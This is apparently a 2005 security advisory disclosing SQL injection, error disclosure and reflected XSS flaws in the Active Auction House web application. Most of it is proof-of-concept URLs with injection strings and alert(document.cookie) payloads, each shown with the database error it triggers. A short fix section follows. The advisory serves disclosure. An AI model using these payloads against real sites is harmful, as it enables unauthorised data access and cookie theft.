-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Active Auction House has multiple Sql injection, error and XSS vulnerabilities Date: 06/04/2005 Vendor: Active Web Softwares Vendor Website: www.activewebsoftwares.com Summary: Active auction house has multiple sql injection, error and xss vulnerabilities. Proof of Concept Exploits: http://localhost/activeauctionsuperstore/default.asp?catid='SQL_ERROR SQL ERROR Microsoft OLE DB Provider for ODBC Drivers error '80040e21' ODBC driver does not support the requested properties. /activeauctionsuperstore/displaycategories.asp, line 52 http://localhost/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemName 'SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ''SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemID='SQL_INJECTION'. /activeauctionsuperstore/ItemInfo.asp, line 18 http://localhost/activeauctionsuperstore/sendpassword.asp SQL INJECTON In the Email field enter a sql injection and done ;) For example entering 'SQL_INJECTION you get Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause. /activeauctionsuperstore/sendpassword.asp, line 45 http://localhost/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password= Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password= Pops cookie http://localhost/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title='php_evil_valuehttp://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=";><script>alert(document.cookie)</script> Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=";><script>alert(document.cookie)</script>&Title=Account Pops cookie http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid=";><script>alert(document.cookie)</script>&%3baccountid= Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA lWYvwOWmoKGHgDKanamGDcvc =GAwn -----END PGP SIGNATURE-----
